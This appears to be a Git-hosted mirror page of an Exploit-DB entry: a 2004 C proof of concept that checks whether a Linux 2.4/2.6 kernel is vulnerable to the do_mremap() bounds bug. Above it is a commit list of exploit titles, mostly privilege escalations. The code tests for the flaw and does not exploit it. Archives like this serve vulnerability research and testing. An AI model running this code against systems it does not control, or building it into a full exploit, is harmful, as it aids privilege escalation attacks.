bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/local/142.c
Offensive Security 38038a7128 DB: 2016-11-24 
6 new exploits

Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow
UCanCode - Multiple Vulnerabilities
Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)
Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)

Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service (PoC)
Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)

Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation

Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation

Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation

Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2)
Linux Kernel 2.6.18 - 'move_pages()' Information Leak
Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak
Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation

Windows x64 - Download & Execute Shellcode (358 bytes)
2016-11-24 05:01:19 +00:00

145 lines
4.1 KiB
C
Executable file
Raw Blame History

/*
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*
* Proof of concept code for testing do_mremap() Linux kernel bug.
* It is based on the code by Christophe Devine and Julien Tinnes
* posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since
* it avoids any kernel data corruption.
*
* The following test was done against the Linux kernel 2.6.0. Similar
* results were obtained against the kernel 2.4.23 and previous ones.
*
* buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c
* buffer@mintaka:~$ ./mremap_bug
*
* Base address : 0x60000000
*
* 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug
* 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug
* 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so
* 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so
* 40016000-40017000 rw-p 00000000 00:00 0
* 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so
* 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so
* 40156000-40159000 rw-p 00000000 00:00 0
* 60000000-60002000 rw-p 00000000 00:00 0
* bfffd000-c0000000 rwxp ffffe000 00:00 0
*
* Remapping at 0x70000000...
*
* 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug
* 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug
* 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so
* 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so
* 40016000-40017000 rw-p 00000000 00:00 0
* 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so
* 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so
* 40156000-40159000 rw-p 00000000 00:00 0
* 60000000-60002000 rw-p 00000000 00:00 0
* 70000000-70000000 rw-p 00000000 00:00 0
* bfffd000-c0000000 rwxp ffffe000 00:00 0
*
* Report :
* This kernel appears to be VULNERABLE
*
* Segmentation fault
* buffer@mintaka:~$
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <asm/unistd.h>
#include <errno.h>
#define MREMAP_FIXED 2
#define PAGESIZE 4096
#define VMASIZE (2*PAGESIZE)
#define BUFSIZE 8192
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
#define MAPS_NO_CHECK 0
#define MAPS_CHECK 1
int mremap_check = 0;
void maps_check(char *buf)
{
if (strstr(buf, "70000000"))
mremap_check++;
}
void read_maps(int fd, char *path, unsigned long flag)
{
ssize_t nbytes;
char buf[BUFSIZE];
if (lseek(fd, 0, SEEK_SET) < 0) {
fprintf(stderr, "Unable to lseek %s\n", path);
return;
}
while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) {
if (flag & MAPS_CHECK)
maps_check(buf);
if (write(STDOUT_FILENO, buf, nbytes) != nbytes) {
fprintf(stderr, "Unable to read %s\n", path);
exit (1);
}
}
}
int main(int argc, char **argv)
{
void *base;
char path[16];
pid_t pid;
int fd;
pid = getpid();
sprintf(path, "/proc/%d/maps", pid);
if ( !(fd = open(path, O_RDONLY))) {
fprintf(stderr, "Unable to open %s\n", path);
return 1;
}
base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
printf("\nBase address : 0x%x\n\n", base);
read_maps(fd, path, MAPS_NO_CHECK);
printf("\nRemapping at 0x70000000...\n\n");
base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *)0x70000000);
read_maps(fd, path, MAPS_CHECK);
printf("\nReport : \n");
(mremap_check)
? printf("This kernel appears to be VULNERABLE\n\n")
: printf("This kernel appears to be NOT VULNERABLE\n\n");
close(fd);
return 0;
}
// milw0rm.com [2004-01-07]
Reference in a new issue View git blame Copy permalink